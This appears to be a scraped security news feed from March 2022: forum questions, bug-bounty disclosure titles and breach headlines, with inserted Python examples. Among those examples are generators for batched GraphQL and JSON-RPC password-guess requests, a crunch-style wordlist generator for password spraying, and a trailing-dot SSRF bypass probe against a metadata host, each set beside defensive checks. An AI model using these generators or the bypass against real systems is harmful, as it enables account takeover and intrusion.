    Author: 时钟@RainSec. This article was contributed by the author; Seebug Paper welcomes your submissions, and accepted articles receive a gift! Submission email: paper@seebug.org. Prerequisites: Magic links. The /proc/ directory contains many link files, but Linux also has a special kind of link file whose size is 0. We know that the size of an ordinary symbolic link equals the length of the target file path, but a magic link has size 0, and the way they are opened...


    Nessus + Pivot Tables
    Hello All, I'm a new security analyst at my firm. I've been introduced to Nessus and tasked with vulnerability management. I'm utilizing Excel pivot tables to organize the tremendous amounts of data. Currently, in the pivot table section for filters, I've input 'Risk' and under rows I have 'Solution & Host.' I then use XLOOKUP to match each host against a server list of administrators. This gives me the person to contact for the specific vulnerability. My question is how are you setting up your pivot tables? Thank you, R2G submitted by /u/Red2Green
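    The same pivot (filter on Risk, rows by Solution and Host, lookup of the host owner) is a few lines of standard-library Python once the Nessus CSV export is parsed, which makes it repeatable between scans and makes hosts with no owner visible instead of silently blank. The following is an added example, not code from the post or from Tenable: the column names follow the Nessus CSV export layout (a subset of columns is used and this is an assumption), and the findings, plugin IDs, hosts and owner list are constructed for the example.

```python
import csv
import io
from collections import defaultdict

# Constructed excerpt in the column layout of a Nessus CSV export (subset of columns);
# plugin IDs, hosts and solution text are made up for this example.
NESSUS_CSV = """Plugin ID,CVE,CVSS,Risk,Host,Protocol,Port,Name,Solution
1001,CVE-2021-44228,10.0,Critical,10.0.1.10,tcp,8080,Apache Log4j RCE (Log4Shell),Upgrade Apache Log4j to a fixed release.
1001,CVE-2021-44228,10.0,Critical,10.0.1.11,tcp,8080,Apache Log4j RCE (Log4Shell),Upgrade Apache Log4j to a fixed release.
1002,,7.5,High,10.0.1.10,tcp,22,SSH Weak Cipher Suites,Remove weak SSH ciphers.
1003,,5.3,Medium,10.0.1.12,tcp,443,TLS 1.0 Enabled,Disable TLS 1.0.
1004,,0.0,None,10.0.1.12,tcp,80,HTTP Server Type,n/a
"""

# Constructed server-owner list (the XLOOKUP source); 10.0.1.11 is deliberately missing.
OWNERS_CSV = """Host,Admin
10.0.1.10,alice@example.test
10.0.1.12,carol@example.test
"""


def load(text: str):
    return list(csv.DictReader(io.StringIO(text)))


def pivot(findings, owners, risks=("Critical", "High")):
    """Rows: Solution x Host with the number of findings, joined to the responsible admin.
    Hosts absent from the owner list come out as UNASSIGNED rather than disappearing."""
    owner_of = {o["Host"]: o["Admin"] for o in owners}
    counts = defaultdict(int)
    for f in findings:
        if f["Risk"] in risks:                       # the pivot's Risk filter
            counts[(f["Solution"], f["Host"])] += 1
    return [
        {"Solution": sol, "Host": host, "Admin": owner_of.get(host, "UNASSIGNED"), "Findings": n}
        for (sol, host), n in sorted(counts.items())
    ]


def by_admin(rows):
    """Regroup the pivot by admin: one to-do list per person to contact."""
    out = defaultdict(list)
    for r in rows:
        out[r["Admin"]].append((r["Solution"], r["Host"]))
    return dict(out)


if __name__ == "__main__":
    rows = pivot(load(NESSUS_CSV), load(OWNERS_CSV))
    for admin, items in by_admin(rows).items():
        print(admin)
        for sol, host in items:
            print(f"  {host}: {sol}")
```

    Grouping by Solution first, as the post does, is the right choice: one remediation line usually closes many plugin findings across a host, so the ticket count tracks work rather than scanner rows.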
    Best app for wifi security assessments using an iphone
    I recently made the switch to Apple from Samsung (S9+ and S22+). Too many issues with Samsung right now. I am looking for replacement apps that can be used on iPhone. Wifi collector https://play.google.com/store/apps/details?id=net.nirsoft.wificollector Network Scanner https://play.google.com/store/apps/details?id=com.myprog.netscan NetworkMapper https://github.com/kost/networkmapper (basically nmap) I know that there may not be a one for one, but I am looking for recommendations on what people are using on the iPhone front. Yes, I have looked in the Apple store but would like to hear from people. Sorry if this broke a rule. submitted by /u/Quickbreach
    How to approach Burp Suite academy and certification
    Hello folks, I currently study web vulnerabilities on the Burp Suite academy, with the aim of passing the certification exam as well as gaining skills and understanding of OWASP TOP 10 vulnerability testing for a future job. The question is how to make notes that would help me in the job/certification exam? I literally copy the whole page text to my Obsidian editor... I just don't want to lose some information that would cause me to misunderstand something. It is like the whole Burp Academy website in my Obsidian, just without pictures; this probably makes no sense, as I cannot find or define the information needed for finding and exploiting vulns (just a bunch of info: what the vulnerability is about, how it impacts a business, types of vulns, etc.). I want to make a cheatsheet for myself based on the content regarding vulnerability identification/testing/exploitation that helps me in an exam environment and the real world. Any tips are appreciated, thank you in advance. submitted by /u/TRYH0
    The best Netsec field for freelancing ?
    What would be the best field in cybersecurity to specialize in for someone who wants to work as a freelancer? Thank you for your input and have a wonderful day submitted by /u/No-Lead497
    Knowing what website leaves the 2FA cookie to know what to keep.
    There are various websites that use 2FA, and I think I do not need the 2FA email if the remember-this-computer cookie has been saved. I delete most cookies, but I keep the ones that I list for the purpose. In Chrome I use Cookie AutoDelete. My question is, how do I know which website leaves the cookie that I want to save? It presumably is not the domain of my financial institution, because I retain those cookies when trying to do this. I wish I could tell what cookie(s) got introduced after doing the 2FA entering of the code. Then I would know what cookie domain to save. I cannot figure it out for any of my browsers: Chrome, Edge, Firefox, Avast, and even Internet Explorer. Any guidance for me? Thanks. This thread is somewhat related, but not quite. submitted by /u/Apt_ferret
    Any introductory links on how to build rules for untangle NG Firewall?
    Hello there.... Noob here looking for tips/links on how to build rules for Untangle NG Firewall. I have installed the Untangle firewall and, as it seems, I am missing something obvious and can't wrap my head around creating the FW rules suitably for my network. I started off by blocking everything as the "last" rule and by allowing stuff that seemed obvious to me as the earlier layers of rules. However, there seems to be a lot of traffic on funny ports by my zoo of different equipment (cameras, mobile devices, cleaning robot, etc.), for example in the port 5xxx range. Therefore, I have tried to search for some help for noobs on how to evaluate what's there and what's essential to keep open beyond the 80/443 TCP and 53 UDP range, but haven't been able to identify something like the condensed notes of rule creation. I need to recon what's there and don't seem to be able to identify it. I'd be absolutely thrilled if anyone could let me know if they have a link on how to start creating suitable rules for a small SOHO network:
    - I have no VLANs or DMZ
    - Firewall lives between router and a Ubiquiti managed switch
    - two APs by Ubiquiti connected to the managed switch
    - several computers (Linux, Mac, Win10), two printers, several mobile devices, cams, vacuum-cleaner-robot on the network, SONOS
    - EVE home appliances
    - messaging apps (WhatsApp, Signal, Telegram, Threema, ...) in use, email with different providers
    - Need no HTTP/HTTPS traffic to enter my network from the outside
    - VPN on an uncommon port
    - no uPNP outside the SOHO network
    So it doesn't seem to be a big issue technically, but I might be mistaken. Any pointer is highly appreciated! submitted by /u/azarot5555
    Emails I didn't send in my sent folder?
    Apologies if this is the wrong sub for this, if there's a better place please let me know. I found this in my "sent" folder on gmail, but I don't know where it came from. I did click on a gmail suggested "unsubscribe" link recently, like in the third pic (not that exact one, I don't remember which or when). I don't imagine clicking such a link would send an email like that. Searching for the address it was sent to in my email just brings the pictured email up. Anyone have an idea of what's going on here? Images: https://slack-files.com/TBEMPBASH-F0385DN63QV-ac613bd467 https://slack-files.com/TBEMPBASH-F0381LD0CNS-2eb1d038e6 https://slack-files.com/TBEMPBASH-F0385E6J6UV-68e5bc7aa6 submitted by /u/pissing_on_the_lawn
    Sniffing packets through hotspot
    If a laptop provides a hotspot for another device, how can we inspect the traffic of the connected device on the laptop? If Wireshark is the answer, then what interface should be selected? The wifi interface has too many redundant packets from other devices too. Please share your suggestions. submitted by /u/Fantastic_Sperm
    What data formats are vulnerable to batching attacks outside of graphql?
    Batching attacks are basically where you can put multiple user and pass params in the same request with different values and the server can check them all, bypassing rate limits and lockout policies. What I'm wondering is what other technologies or data formats by their very implementation also allow for this behavior outside of GraphQL. I believe old SOAP APIs can support batch requests encapsulated in the XML. Another is potentially multipart form data type requests, although I never tested if batching is possible on these. submitted by /u/Academic-Discount252
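    The root cause is a rate limit or lockout counter that is charged once per HTTP request while the request carries many credential checks. Besides GraphQL (both a JSON array of operations and aliased selections inside one document), JSON-RPC 2.0 batches, which are plain JSON arrays of calls, have the same shape. The code below is an added example (not from the post and not from any particular server): it counts the credential attempts a body actually contains across those three forms and charges a sliding-window limiter per attempt instead of per request. The field name `login` and the attacker bodies are constructed for the example.

```python
import json
import re
from collections import defaultdict

# Field/method name that performs a credential check (assumed for this example).
LOGIN_FIELD = "login"
# GraphQL: "alias: login(" or a bare "login("; every match is one credential attempt.
_LOGIN_CALL = re.compile(r"(?:\w+\s*:\s*)?\b" + LOGIN_FIELD + r"\s*\(")


def count_attempts(body: str) -> int:
    """How many credential attempts one HTTP request body really carries.

    Handles a JSON array of GraphQL operations (batch), aliased login selections
    inside a single GraphQL document, and a JSON-RPC 2.0 batch (array of calls)."""
    try:
        doc = json.loads(body)
    except ValueError:
        return 1  # form-encoded or unknown body: treat as a single attempt
    ops = doc if isinstance(doc, list) else [doc]
    total = 0
    for op in ops:
        if not isinstance(op, dict):
            continue
        if isinstance(op.get("query"), str):
            total += len(_LOGIN_CALL.findall(op["query"]))
        elif op.get("method") == LOGIN_FIELD:
            total += 1
    return total


class AttemptLimiter:
    """Sliding-window limiter charged per credential attempt, not per request."""

    def __init__(self, max_attempts: int, window_s: float):
        self.max_attempts, self.window_s = max_attempts, window_s
        self._hits = defaultdict(list)  # key (client IP, target account, ...) -> timestamps

    def allow(self, key: str, attempts: int, now: float) -> bool:
        recent = [t for t in self._hits[key] if now - t < self.window_s]
        if len(recent) + attempts > self.max_attempts:
            self._hits[key] = recent
            return False
        self._hits[key] = recent + [now] * attempts
        return True


def graphql_batch(n: int) -> str:
    """Constructed attacker body: n password guesses as aliased mutations in one document."""
    sel = " ".join(f'a{i}: login(user: "bob", pass: "p{i}") {{ token }}' for i in range(n))
    return json.dumps({"query": f"mutation {{ {sel} }}"})


def jsonrpc_batch(n: int) -> str:
    """Constructed attacker body: n guesses as a JSON-RPC 2.0 batch."""
    return json.dumps([
        {"jsonrpc": "2.0", "id": i, "method": LOGIN_FIELD,
         "params": {"user": "bob", "pass": f"p{i}"}} for i in range(n)
    ])


if __name__ == "__main__":
    naive = AttemptLimiter(max_attempts=5, window_s=60)      # charged 1 per request
    correct = AttemptLimiter(max_attempts=5, window_s=60)    # charged per attempt
    body = graphql_batch(50)
    print("per-request limiter lets 50 guesses through:", naive.allow("10.0.0.9", 1, now=0.0))
    print("per-attempt limiter:", correct.allow("10.0.0.9", count_attempts(body), now=0.0))
```

    Counting is only half of it: the limiter key should include the target account, since the point of a batch is usually many passwords against one user, and a server that rejects batches on the login mutation outright (one operation per request on authentication endpoints) removes the problem without any counting.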

    Ukraine: situation update as of 24 March
    The last 24 hours Continue reading on Medium »
    Open-source intelligence (OSINT): a way to obtain data from the web
    What is open-source intelligence? Can a business owner or a company employee carry it out on their own? OSINT consists of gathering… Continue reading on Blog Transparent Data »
    OSINT Methodology and Tradecraft: Tips for Winning The Trace Labs Black Badge from Team Federal…
    INTRODUCTION Continue reading on Medium »

    TrustedSec Okta Breach Recommendations
    TrustedSec’s Incident Response Team sent urgent communications to all IR retainer clients after the discovery of the compromise of Okta. Below are the recommendations provided with additional updates after reviewing more information on 03/23/2022. On March 22, 2022, the threat group LAPSUS$ announced a successful compromise of Okta, a heavily used identity and access management... The post TrustedSec Okta Breach Recommendations appeared first on TrustedSec.

    Proxy: Accessing Network Connection
    No content preview
    The mystery of SQLMap’s --eval
    No content preview
    Authentication bypass using root array
    No content preview

    I've heard someone here might be interested in virus(ransomware) samples. I'd like to know what this is or what to do about it.
    submitted by /u/TarnaBar
    Large-scale npm attack targets Azure developers with malicious packages
    submitted by /u/SRMish3
    GitHub - Developers Support Ukraine
    submitted by /u/ssh-mitm
    LTrack: Stealthy Tracking of Mobile Phones in LTE
    submitted by /u/rbarkley
    Microsoft: DEV-0537 (LAPSUS$) criminal actor targeting organizations for data exfiltration and destruction
    submitted by /u/momothereal

    A Detailed Guide on Crunch
    Introduction Oftentimes attackers need to generate a wordlist based on certain criteria required for pentest scenarios like password spraying/brute-forcing. Other The post A Detailed Guide on Crunch appeared first on Hacking Articles.
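    The criteria in question are usually a pattern: a known prefix, a position that must be a digit, a position that must be upper case. Crunch expresses this with its -t placeholders (@ lower case, , upper case, % digit, ^ symbol). As an added example, and not crunch's own code, the generator below expands such a pattern the same way, adds a filter on runs of repeated characters in the spirit of crunch's -d option, and can stream the result to a file; the symbol set is an assumed subset chosen for the example.

```python
import itertools
import string

# Placeholder classes in the style of crunch -t: @ lower case, , upper case,
# % digits, ^ symbols.  The symbol set is an assumed subset for this example.
CLASSES = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=",
}


def _longest_run(word: str) -> int:
    """Length of the longest run of identical adjacent characters."""
    return max((len(list(g)) for _, g in itertools.groupby(word)), default=0)


def expand(pattern: str, max_repeat=None, classes=CLASSES):
    """Yield every word matching pattern; characters outside CLASSES are literals.
    max_repeat loosely mimics crunch -d: drop words with a longer run of one character."""
    slots = [classes.get(ch, ch) for ch in pattern]
    for combo in itertools.product(*slots):
        word = "".join(combo)
        if max_repeat is None or _longest_run(word) <= max_repeat:
            yield word


def count(pattern: str, classes=CLASSES) -> int:
    """Size of the unfiltered wordlist: check this before writing it to disk."""
    n = 1
    for ch in pattern:
        n *= len(classes.get(ch, ch))
    return n


def write_wordlist(pattern: str, path: str, **kw) -> int:
    """Stream the wordlist to path, one word per line; returns the number written."""
    written = 0
    with open(path, "w", encoding="ascii") as fh:
        for word in expand(pattern, **kw):
            fh.write(word + "\n")
            written += 1
    return written


if __name__ == "__main__":
    print(count("Spring%%%%"), "candidates for Spring + four digits")
    print(list(itertools.islice(expand(",@@@%%"), 5)))
```

    Always call count() first: the product grows fast, and a pattern like @@@@@@@@ is 26^8 words, which is why crunch users reach for -d and for prefixes taken from the target's naming conventions.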

    What if…
    … Your IdP is breached Continue reading on Neuvik »

    SecWiki News 2022-03-23 Review
    Windows Driver Signing: Lessons Learned by yunshanwuyin; A First Look at Shellcode AV Evasion by yunshanwuyin. For more recent articles, visit SecWiki.

    Multiple ways to find sql and cheatsheet
    Comments out the rest of the query. Line comments are generally useful for ignoring the rest of the query so you don’t have to deal with fixing… Continue reading on Medium »
    Information Disclosure Bug
    Web security Continue reading on Medium »
    How I Was Able To TakeOver Any Account On One Of Europe's Largest Media Companies
    Welcome back, I have not produced a writeup in over a week due to hunting for further vulnerabilities on Hall Of Fame sites, many of which… Continue reading on Medium »
    My Pentest Log -11- (CSRF in ASP)
    Greetings everyone from the Basilica, Continue reading on Medium »
    Zenlink Partners with Immunefi and Launches Bug Bounty
    March 23, 2022 — We are pleased to announce that Zenlink has partnered with Immunefi and launched a bug bounty program. Continue reading on Zenlink Foundation Ltd. »
    Supply Chain Attacks: A ripe area for research
    Let’s discuss supply chain attacks and why they are a great research area at the moment. Continue reading on Pentester Academy Blog »
    No Rate Limit at Reset Password Endpoint can Lead to account takeover (APPLE CORP)
    First of all, this is my first writeup, so forgive any mistake, or you can send me a message to share your knowledge or increase… Continue reading on Medium »

    Bypassing domain deny_list rule in Smokescreen via trailing dot leads to SSRF
    Stripe disclosed a bug submitted by gregxsunday: https://hackerone.com/reports/1410214 - Bounty: $1500
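    The bypass named in the title is a deny list compared against the host string as the client sent it: `metadata.google.internal.` with a trailing dot is the same fully qualified name to the resolver, but it is not string-equal to the listed `metadata.google.internal`. The following is an added illustration, not Smokescreen's code: a naive check beside one that canonicalises the host (NFKC, lower case, trailing dot stripped, IDNA) and fails closed on anything it cannot parse. The deny list, hostnames and networks are constructed for the example, and a real egress proxy must additionally check the IP it actually connects to after DNS resolution, which this host-level check does not do.

```python
import ipaddress
import unicodedata
from urllib.parse import urlsplit

# Constructed deny list for the example: internal suffixes plus link-local and private ranges.
DENY_SUFFIXES = ("metadata.google.internal", "internal.example")
DENY_NETS = [ipaddress.ip_network(n) for n in ("169.254.0.0/16", "10.0.0.0/8", "127.0.0.0/8")]


def _suffix_denied(host: str) -> bool:
    return any(host == s or host.endswith("." + s) for s in DENY_SUFFIXES)


def is_denied_naive(url: str) -> bool:
    """Compares the host string as sent: a trailing dot slips past."""
    host = urlsplit(url).hostname or ""
    return host == "169.254.169.254" or _suffix_denied(host)


def canonical_host(host: str) -> str:
    """Fold the host into the form the resolver will actually look up."""
    host = unicodedata.normalize("NFKC", host).strip().lower().rstrip(".")
    return host.encode("idna").decode("ascii")  # non-ASCII labels become punycode


def is_denied(url: str) -> bool:
    """Deny-list check on the canonical host; empty or malformed hosts fail closed."""
    try:
        host = canonical_host(urlsplit(url).hostname or "")
    except (UnicodeError, ValueError):
        return True
    if not host:
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return _suffix_denied(host)        # a name: suffix match
    return any(ip in net for net in DENY_NETS)   # a literal address: range match


if __name__ == "__main__":
    probe = "http://metadata.google.internal./computeMetadata/v1/"
    print("naive:", is_denied_naive(probe), " canonical:", is_denied(probe))
```

    The canonical form also catches mixed case and full-width Unicode look-alikes, but not alternative IP spellings such as decimal or hexadecimal integers, which is one more reason the check on the resolved address at connect time is the one that counts.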
    XSS Reflected at https://sketch.pixiv.net/ Via `next_url`
    pixiv disclosed a bug submitted by aidilarf_2000: https://hackerone.com/reports/1503601 - Bounty: $500

    Operation Dragon Castling: APT group targeting betting companies - Avast Threat Labs
    submitted by /u/dmchell

    Another Vulnerability in the LPC55S69 ROM
    Article URL: https://oxide.computer/blog/another-vulnerability-in-the-lpc55s69-rom Comments URL: https://news.ycombinator.com/item?id=30778778 Points: 137 # Comments: 46

    Dell discloses five vulnerabilities affecting millions of Inspiron, Vostro, XPS and Alienware systems
    Dell BIOS has five new security vulnerabilities that, if exploited by attackers, could lead to code execution on vulnerable systems.
    FreeBuf Morning Brief | Hackers leak 37GB of Microsoft source code; White House shares a checklist for responding to Russian cyberattacks
    A hacker group leaked 37GB of Microsoft source code related to hundreds of projects, including Bing and Cortana.
    Tophant (斗象科技) CEO Xie Chen: the Chinese and U.S. cybersecurity markets are diverging markedly, and a "parallel universe" is emerging
    A distinct "Chinese cybersecurity universe", parallel to the overseas one, has emerged.
    High-severity vulnerabilities in NFC? See how he analyzes one (CVE-2021-0870)
    NFC plays an important role in daily life and has become an indispensable component of mobile devices. Like Bluetooth, NFC uses radio frequency technology to communicate between devices, so both the chip firmware and the host NFC subsystem are targets for remote code execution (RCE) attacks.
    The 2021 DRP (Digital Risk Protection) Annual Report is released
    Properly addressing the risks of digital transformation lets enterprises make full use of digital transformation technologies and truly enjoy the benefits they bring.
    Okta is investigating a data breach and extortion by the Lapsus$ group
    Okta, a leading provider of authentication services and identity and access management (IAM) solutions, recently said it is investigating a data breach involving extortion.
    ELTA hit by ransomware attack, Greek public postal service goes offline
    Greece's state-owned postal service provider ELTA suffered a ransomware attack that took most of its services offline.
    Microsoft confirms breach by the Lapsus$ extortion group
    Microsoft has confirmed that one of its employees was compromised by the Lapsus$ hacking group, allowing the hackers to access and steal part of its source code.
    Nestlé attacked by Anonymous, 10GB of sensitive data leaked
    Recently, the international hacker collective Anonymous announced that it had successfully attacked Nestlé.
    Owned: I can see your secret keys
    The more knowledge, the better.
    Revealed! The "PR" tricks of female streamers and male operators
    In recent years the live-streaming economy has grown rapidly, producing a large number of internet-celebrity streamers.
    Baihang Credit Co., Ltd. is hiring for a security management position
    Hiring for security management (junior to mid-level); directly under the central bank, six insurances and two housing funds, talent housing, two meals included.
    SaaS-to-SaaS connections may become a major cybersecurity threat
    The biggest challenge to solve at present is the lack of visibility into user activity and data, followed by knowing all the SaaS applications in use and managing them centrally.

    Anatomy of a Ghost CVE
    Article URL: https://daniel.haxx.se/blog/2022/03/23/anatomy-of-a-ghost-cve/ Comments URL: https://news.ycombinator.com/item?id=30776755 Points: 16 # Comments: 0

    Random Stuff (Mac SW, Wallpapers, Images)
    submitted by /u/ilikemacsalot

    An In-Depth Look at Reflective DLL Injection
    Author: Sangfor Qianlimu Security Lab. Original: https://mp.weixin.qq.com/s/kVpesy_w7XLanL_WhRhn-Q 1. Preface. DLL injection is a technique that makes a target process load a specified DLL on its own. To improve stealth, malware commonly uses DLL injection to inject its malicious code, in the form of a DLL, into a highly trusted process. Conventional DLL injection uses the LoadLibraryA() function to make the injected process load the specified DLL. Conventional D...
    Storm Cloud Stirs Up a Storm: GIMMICK Malware Attacks macOS
    Translator: Knownsec 404 Team translation group. Original: https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/ In late 2021, Volexity discovered an intrusion in an environment covered by its network security monitoring service. Volexity detected a system running frp, or fast reverse...

    road map
    To the kind people: can someone please create a computer forensics road map for beginners, mentioning the OS types, the tools, and the resources to learn and find practice material? submitted by /u/ItchyPilot9804
    Portscanning and malware in Encase8
    Hello all! I was hoping to see if anyone could help me with a school project I'm working on that has me a bit lost in the woods. We just learned about portscanning and malware in class but, unlike many of our other classes, we did not do a lab to help us understand the process required to gather the information. The assignment gave us two forensically imaged drives: one was the source of the alleged attack (a student) and the 'victim' was another (the teacher). I have my suspicions (based on the class) that the scan was not malicious but the product of a malware attack through open ports, but that's what I want to find out! I just started using EnCase 8 (moved from EnCase 6), so my proficiency is abysmal currently with the new UI.

    For those who have experience out there, what should I be looking at first? Programs to use that may be better than EnCase (and free)? My gut says to try and find programs of execution and build a timeline. What should I be looking at? svchost.exe? AppData? ShimCache? (Probably all of these, but to be honest I don't know what I'm looking for because I don't know where to start.) What does evidence of portscanning 'look' like? submitted by /u/SkitzTheFritz


    Hacking, Spyware & The Internet of Things
    In September 2021, my iPhone was remotely wiped after glitching for a few weeks. The phone was given to me by my ex who I currently have an order of protection against arising from a domestic violence incident in March of 2020. He always knew things he shouldn’t have but I thought he was physically going through my phone but realized after this happened that a few instances would have required remote access. My order of protection expires in less than 2 weeks and I need help. He is not technologically savvy but owns several companies with internal IT Departments and has the financial resources to do most of what is possible in the world of tech stalking and hacking. Within 2 days of my phone being wiped, every one of my accounts was hacked (except my gmail that had my Mother’s phone numb…
    Anyone know how to add a new root certificate into the 'Brave' browser?
    I need to MitM myself for a personal project. Thanks for any suggestions. submitted by /u/boli99
    Would you / Do you use a virtualized firewall on the Cloud? What are the benefits?
    Some vendors offer firewall solutions for the cloud (mostly PA with VM-Series, Check Point with Quantum and Fortinet with FortiGate afaik). These are pretty much the same software/firmware they have on physical firewalls, but they virtualize it and put it on cloud instances, then you configure your traffic to go through them. Do you use any of these solutions? If yes, why? Do you like them? I want to understand more about their benefits and downsides.

    What I can see as benefits are:
    - More visibility (L7) and control over the CSP's native firewall
    - Integrated threat intelligence and other AI/ML features
    - Other bonus features (DNS security, for example)

    And downsides would be:
    - Additional cost when you already have your CSP firewall for "free"
    - Single point of failure, hard to set up and maintain (I think?)
    - Same security benefits can be achieved using more cloud-native tooling (I think?)

    What do you think? Do you or would you use one of those? Personally I think the downsides outweigh the benefits, but I would love to hear differing opinions. submitted by /u/lacioffi
    I'm going to be going to hospital for a little while; I was planning to use RealVNC on my phone to use my home office while there. I'm assuming this will be okay to use for 2-3 weeks then i can uninstall it all?
    I don't know too much; forgive my ignorance. I've never had to do any remote-ing outside of my home office but I cannot avoid the surgery of course. submitted by /u/Buttercup59129
    Need advice about my career
    Hi; I have basic knowledge in programming but I can understand code to a certain level. And I play CTF challenges, and I can say that I am a beginner but I have a good understanding of the flaws, except I still struggle in exploiting some vulnerabilities. But in the matter of knowing what is happening I can tell a lot and identify vulnerabilities, but I can't exploit all of them. I really need advice or a suggestion about what I can do with my actual knowledge, and if I can use it to find a job according to my current level, or whether I need to improve my skills more to find a job. (I really need a job asap) submitted by /u/xmrchaos
    What features would make my ISO 27002 Explorer even better?
    I've created the ISO 27002 Explorer for information security professionals. You can use it to search through the ISO 27002 security controls and filter on different attributes. 👉️ What features should I add to make it even more useful? I already got the following suggestions on my original post: display the 2013 version controls a 2022 version control may replace –🙏🏻 u/dogpupkus, trying to add this by tomorrow; a button to remove filters – also u/dogpupkus – don't think that's possible on the #nocode platform I'm using; add the full control text – can't do that bc of copyright, though I'm thinking of adding translations, see this thread for an example; would I like a beer/coffee or something? 🍻 u/RHvdW very nice of you, you can help me by engaging with @iso27diy Have fun and let me know what you think! submitted by /u/But-I-Am-a-Robot [link] [comments]
    How does response manipulation via a mitm proxy like burp lead to bugs?
https://ashutoshmishra00x0.medium.com/account-takeover-via-response-manipulation-worth-1800-ffb242cc55c9 Take this for example: it leads to an OTP bypass and account takeover by setting success false to success true. Considering the response is just for the client to see, how does this affect the server at all? Is the server sometimes programmed to poll specific endpoint responses and serve a page based on that? If so, is there any interesting way to simulate this behavior in a local environment, as maybe a capture the flag? I wanna see why and how it works so I can continue to find them more in the wild; it just never made sense to me. Like, requests are obvious: the server parses the input and does transformations, sometimes reflects it, etc. But responses, I have no clue why spoofing responses would work. submitted by /u/Academic-Discount252 [link] [comments]
    Self-taught outside of the US
Last time I asked you if it was possible to work in cyber security without being an ex-engineer, I got so many useful replies (thank you again!!), but I forgot to mention that I live in Europe (France). So now I’m once again losing hope because I don’t know if everything I’m learning will ever grant me a job. Here having a degree is mandatory, so I’m stuck. Do you know of people hired in the US coming from outside? Are people still getting visa sponsorships or did that become exceptional? And finally, what do you think of the IT industry in Canada? Thanks again for helping me; I’m by myself on this path so your advice is very valuable. submitted by /u/No-Lead497 [link] [comments]

    Ricochet reborn: We are building a user friendly TORChat (Ricochet) for GNU/Linux, MacOS and Windows
    submitted by /u/SpeekSecure [link] [comments]
    [CFP] Call for paper/tools/workshop for THREAT CON 2022 is now live
    submitted by /u/nyoface [link] [comments]
    OpenSSH phishing FIDO token protected keys (PoC)
    submitted by /u/ssh-mitm [link] [comments]
    A journey into IoT - Unknown Chinese alarm - Part 1 - Discover components and ports
    submitted by /u/0xdea [link] [comments]
    Multiple Vulnerabilities in GARO Wallbox
    submitted by /u/eddit__plus [link] [comments]
    RomHack 2022 CFP is Open!
    submitted by /u/smaury [link] [comments]

    Playing with test fuzzing in Go
    Go 1.18 recently introduced test fuzzing, so I decided to give it a go (no no, I’m not making a stupid joke). Continue reading on Medium »

    Incorrect Authorization Checks in /include/findusers.php
    ImpressCMS disclosed a bug submitted by egix: https://hackerone.com/reports/1081137
    Arbitrary File Deletion via Path Traversal in image-edit.php
    ImpressCMS disclosed a bug submitted by egix: https://hackerone.com/reports/1081878
    Potential Authentication Bypass through "autologin" feature
    ImpressCMS disclosed a bug submitted by egix: https://hackerone.com/reports/1081986
    Regexes with large repetitions on empty sub-expressions take a very long time to parse
    Internet Bug Bounty disclosed a bug submitted by addisoncrump: https://hackerone.com/reports/1518036 - Bounty: $4000
    The endpoint '/test/webhooks' is vulnerable to DNS Rebinding
    Omise disclosed a bug submitted by sim4n6: https://hackerone.com/reports/1379656 - Bounty: $100
    Race condition on action: Invite members to a team
    Omise disclosed a bug submitted by sim4n6: https://hackerone.com/reports/1285538 - Bounty: $100
    The endpoint /api/internal/graphql/requestAuthEmail on Khanacademy.or is vulnerable to Race Condition Attack.
    Khan Academy disclosed a bug submitted by sim4n6: https://hackerone.com/reports/1293377
    Web Cache poisoning attack leads to User information Disclosure and more
    Lyst disclosed a bug submitted by deksterh1: https://hackerone.com/reports/631589 - Bounty: $300
    [https:///]&&[https:///] Open Redirection
    Lyst disclosed a bug submitted by mandark: https://hackerone.com/reports/537047 - Bounty: $300
HTML injection via invite members can lead to account takeover
    Mattermost disclosed a bug submitted by rynexxx: https://hackerone.com/reports/1443567 - Bounty: $150

    DEV-0537 criminal actor targeting organizations for data exfiltration and destruction - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]
    OffSecOps: Using Jenkins For Red Team Tooling
    submitted by /u/dmchell [link] [comments]

    Secularism vs Individual Rights in Karnataka + Cost of Living in Spain + More
    On this 5th edition of the discursus Protest Analytics newsletter — March 22, 2022 Continue reading on discursus.io »
Ukraine — Situation update, 23 March
    The last 24 hours Continue reading on Medium »

    Taco Bell Born X Raised Shirt
    Buy : https://teespring.com/en-GB/taco-bell-born-x-raised-shirt Continue reading on Medium »

Unauthorized use cases of a Google Maps API key
    Hey folks, Continue reading on Medium »
    The mystery of SQLMap’s --eval
    Master the power of exploiting most complex SQL injections Continue reading on InfoSec Write-ups »
    Stumbling into the bug of another
    The work of another bug hunter is staring back at you. Is your job half done? Continue reading on Medium »

    Lsass.exe spawning werfault.exe
Hi Folks, today I found suspicious behaviour on two DCs inside the network where lsass.exe spawned the process werfault.exe. While investigating I was not able to get any artifact that indicates the servers might be compromised. I detected this on the SIEM, and the EDR logs don't mention the process lineage. Can you people help me? submitted by /u/i_whiteheart [link] [comments]
    Autopsy for Network forensic analysis
As far as I know, tools like Wireshark and Burp Suite are the go-to applications for network forensics. But when I was playing with Autopsy I found out that it can get browser activity and cookie info. So are there more options to analyze network-related activities through Autopsy? Or any plugins that can be used for this purpose? Edit: This might not make sense, probably, and I have not found any articles related to the above online. I am just curious and would love to know if it's an option. submitted by /u/madladmary [link] [comments]
    Presentation topics
    I am an IR professional and I am doing a presentation to Digital Forensics students in a couple of months. Any recommendations for topics I should touch on? Any DF students out there have any suggestions on what they would like to hear from an IR person? submitted by /u/Digital_forensicator [link] [comments]
    GCIH or GCFA?
I am looking to get my first GIAC cert and it's between these two. I already have two years of cybersec experience as an analyst and have the A+, Sec+ and CySA+ under my belt. I want to move on to something a little more challenging. I’d love to take a jab at GCFA but I am afraid it's way too advanced for me. How likely are you to recommend someone jump into this? Or would you recommend going after a different cert before this? I am trying to sharpen my IR skills. submitted by /u/Enes_24 [link] [comments]

    SecWiki News 2022-03-22 Review
SecWiki Weekly (Issue 420) by ourren. For more of the latest articles, visit SecWiki

    Top 4 Books to learn Web Browser Security in 2022
    submitted by /u/pat_ventuzelo [link] [comments]

    OpenSSL BN_mod_sqrt() exploit published (CVE-2022-0778)
    Article URL: https://github.com/drago-96/CVE-2022-0778 Comments URL: https://news.ycombinator.com/item?id=30765727 Points: 1 # Comments: 0

Thoughts on how to better present the value of red/blue adversarial exercises
